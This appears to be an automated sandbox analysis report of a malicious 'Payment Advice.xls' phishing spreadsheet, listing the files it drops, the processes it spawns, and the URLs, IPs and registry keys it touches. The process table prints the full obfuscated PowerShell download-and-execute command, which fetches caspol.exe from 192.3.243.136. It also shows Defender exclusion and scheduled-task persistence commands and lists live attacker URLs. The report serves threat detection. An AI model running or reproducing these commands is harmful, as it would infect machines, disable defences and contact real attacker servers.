Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
Payment Advice.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 01:29:52 2024, Security: 1
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF6CCF4596F2406470.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Users\user\AppData\Roaming\CF97F5\5879F5.exe (copy)
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\caspol.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\Desktop\Payment Advice.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B39E307.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5987A0CE.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\68BFBA8B.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A869FC32.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDA2DB10.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1ajzdp3d.tf5.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4cy2gzqu.2hf.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\53o4551w.x5q.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5dlmlx1m.vsq.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx
|
Microsoft Excel 2007+
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\PORTS SITUATION BULK CARRIERS.xlsx:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES37A5.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:56:43 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESB0AA.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Nov 20 06:57:14 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\c2d4zi2l.bv3.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\cdwye0yl.4lp.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fb0memo4.k4k.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fc3stk3r.wb1.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fcvcdj1d.wrn.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\jpbm12t2.u2x.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\jx4thbox.b5z.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\k2ueiyvl.ktr.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\kiv1dtcn.j4h.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\mnwb31g4.t0h.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmp1F44.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\txysfggx.pwo.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\z3hjfgw1.zmc.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zedpap0h.oz0.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zkybtyb3.12m.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (372)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\zwyw2omb.eeq.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\zzpagiam.5a2.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF6D08248E007BBF07.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFB2E53F3C936E1C95.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFE43205A127440685.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
|
data
|
dropped
|
||
C:\Users\user\Desktop\CA430000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
|
dropped
|
||
C:\Users\user\Desktop\CA430000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 51 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX
bYpAss -nOP -W 1
-c DeViCecReDenTIaldEpLOyment ;
iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.cmdline"
|
||
C:\Users\user\AppData\Roaming\caspol.exe
|
"C:\Users\user\AppData\Roaming\caspol.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
|
||
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpAAE0.tmp"
|
||
C:\Users\user\AppData\Roaming\caspol.exe
|
"C:\Users\user\AppData\Roaming\caspol.exe"
|
||
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
|
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
|
||
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmpDCB9.tmp"
|
||
C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe
|
"C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX
bYpAss -nOP -W 1
-c DeViCecReDenTIaldEpLOyment ;
iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.cmdline"
|
||
C:\Users\user\AppData\Roaming\caspol.exe
|
"C:\Users\user\AppData\Roaming\caspol.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\caspol.exe"
|
||
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe"
|
||
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\user\AppData\Local\Temp\tmp1F44.tmp"
|
||
C:\Users\user\AppData\Roaming\caspol.exe
|
"C:\Users\user\AppData\Roaming\caspol.exe"
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37A5.tmp"
"c:\Users\user\AppData\Local\Temp\i4ik0bio\CSCA15BDDDB4364D65A645793B6780D1C5.TMP"
|
||
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
|
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
|
||
C:\Windows\System32\taskeng.exe
|
taskeng.exe {819EB824-4817-4048-BBF5-A7A0A0C35676} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB0AA.tmp"
"c:\Users\user\AppData\Local\Temp\zpwvvpvf\CSC31AA5FCDA54445E088EDA110AE3BEBC4.TMP"
|
There are 18 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta
|
192.3.243.136
|
||
94.156.177.41/simple/five/fre.php
|
|||
http://192.3.243.136/55/caspol.exe
|
192.3.243.136
|
||
http://94.156.177.41/simple/five/fre.php
|
94.156.177.41
|
||
http://192.3.243.136/
|
unknown
|
||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionk.hta
|
unknown
|
||
https://provit.uk/~
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta..
|
unknown
|
||
http://crl.entrust.n?
|
unknown
|
||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion/k
|
unknown
|
||
http://ocsp.entrust.net03
|
unknown
|
||
http://www.ibsensoftware.com/
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://provit.uk/
|
unknown
|
||
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htavf
|
unknown
|
||
http://go.micros
|
unknown
|
||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion0k
|
unknown
|
||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionvc
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaC:
|
unknown
|
||
http://192.3.243.136/55/caspol.exep
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaZf
|
unknown
|
||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion
|
198.244.140.41
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htadf
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://192.3.243.136/55/caspol.e
|
unknown
|
||
http://kbfvzoboss.bid/alien/fre.php
|
|||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://alphastand.top/alien/fre.php
|
|||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion2
|
unknown
|
||
https://provit.uk/J
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
http://alphastand.win/alien/fre.php
|
|||
http://alphastand.trade/alien/fre.php
|
|||
https://provit.uk/:
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta38
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namep5W
|
unknown
|
||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestionket
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaV8
|
unknown
|
||
http://192.3.243.136/55/caspol.exe6
|
unknown
|
||
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaHf
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta=8
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta$1
|
unknown
|
||
https://provit.uk/CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion?
|
unknown
|
||
https://secure.comodo.com/CPS0
|
unknown
|
||
http://192.3.243.136/xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaht
|
unknown
|
||
http://crl.entrust.net/2048ca.crl0
|
unknown
|
There are 43 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
provit.uk
|
198.244.140.41
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
192.3.243.136
|
unknown
|
United States
|
||
94.156.177.41
|
unknown
|
Bulgaria
|
||
198.244.140.41
|
provit.uk
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
v;/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2A44A
|
2A44A
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
{"/
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\36E8B
|
36E8B
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\377BF
|
377BF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\38594
|
38594
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
